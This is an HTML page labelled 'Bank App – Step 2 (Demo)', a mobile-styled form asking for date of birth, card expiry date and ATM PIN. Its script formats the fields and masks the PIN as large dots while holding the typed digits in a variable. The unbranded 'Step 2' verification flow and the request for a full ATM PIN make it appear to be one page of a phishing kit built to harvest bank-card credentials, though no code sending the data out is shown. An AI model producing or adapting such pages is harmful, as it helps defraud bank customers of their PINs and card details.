<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Bank App – Step 2 (Demo)</title>

<style>
:root{
  --primary:#0a4da2;
  --primary-dark:#083b7a;
  --bg:#eef4fb;
  --text:#1f2a44;
  --muted:#6b7a99;
  --border:#d6e0f0;
}

*{
  box-sizing:border-box;
  margin:0;
  padding:0;
  font-family:Arial,Helvetica,sans-serif;
}

body{
  background:var(--bg);
  color:var(--text);
}

.page{
  max-width:360px;
  margin:auto;
  background:var(--bg);
}

/* ===== TOP IMAGE ===== */
.top-banner{
  height:190px;
  overflow:hidden;
}
.top-banner img{
  width:100%;
  height:110%;
  object-fit:cover;
  display:block;
}

/* ===== FORM ===== */
.form-box{
  padding:16px;
}

h2{
  text-align:center;
  color:var(--primary);
  margin-bottom:16px;
  font-size:18px;
}

label{
  font-size:14px;
  margin-bottom:4px;
  display:block;
}

label span{color:red}

input{
  width:100%;
  height:42px;
  padding:10px;
  font-size:14px;
  border:1px solid var(--border);
  border-radius:6px;
  margin-bottom:14px;
}

input:focus{
  outline:none;
  border-color:var(--primary);
}

/* BIG PIN DOTS */
#pin{
  font-size:42px;
  letter-spacing:22px;
  text-align:center;
  caret-color:transparent;
}

button{
  width:100%;
  height:46px;
  border:none;
  border-radius:6px;
  font-size:16px;
  color:#fff;
  background:var(--primary);
}

button:disabled{
  background:#b9c7de;
}

/* ===== BOTTOM IMAGE ===== */
.bottom-banner{
  height:140px;
  overflow:hidden;
}
.bottom-banner img{
  width:100%;
  height:115%;
  object-fit:cover;
  display:block;
}
</style>
</head>

<body>

<div class="page">

  <!-- 🔼 TOP PHOTO -->
  <div class="top-banner">
    <img src="img/top-banner.jpg" alt="Top Banner">
  </div>

  <!-- FORM -->
  <div class="form-box">
    <h2>Step 2 – Verification</h2>

    <label>Date of Birth <span>*</span></label>
    <input type="tel" id="dob" placeholder="DD/MM/YYYY" maxlength="10">

    <label>Card Expiry Date <span>*</span></label>
    <input type="tel" id="expiry" placeholder="MM/YY" maxlength="5">

    <label>ATM PIN <span>*</span></label>
    <input type="tel" id="pin" inputmode="numeric" placeholder="••••">

    <button id="continueBtn" disabled>Continue</button>
  </div>

  <!-- 🔽 BOTTOM PHOTO -->
  <div class="bottom-banner">
    <img src="img/bottom-banner.jpg" alt="Bottom Banner">
  </div>

</div>

<script>
const dob = document.getElementById("dob");
const expiry = document.getElementById("expiry");
const pin = document.getElementById("pin");
const btn = document.getElementById("continueBtn");

let fakePin = "";

/* DOB FORMAT */
dob.addEventListener("input",()=>{
  let v = dob.value.replace(/\D/g,"").slice(0,8);
  let f = "";
  if(v.length>0) f = v.slice(0,2);
  if(v.length>2) f += "/" + v.slice(2,4);
  if(v.length>4) f += "/" + v.slice(4);
  dob.value = f;
  validate();
});

/* EXPIRY FORMAT */
expiry.addEventListener("input",()=>{
  let v = expiry.value.replace(/\D/g,"").slice(0,4);
  if(v.length>2) v = v.slice(0,2)+"/"+v.slice(2);
  expiry.value = v;
  validate();
});

/* PIN BIG DOT DEMO */
pin.addEventListener("input",e=>{
  if(e.inputType==="deleteContentBackward"){
    fakePin = fakePin.slice(0,-1);
  }else if(/\d/.test(e.data) && fakePin.length<4){
    fakePin += e.data;
  }
  pin.value = "•".repeat(fakePin.length);
  validate();
});

/* VALIDATION */
function validate(){
  btn.disabled = !(
    dob.value.length===10 &&
    expiry.value.length===5 &&
    fakePin.length===4
  );
}
</script>

</body>
</html>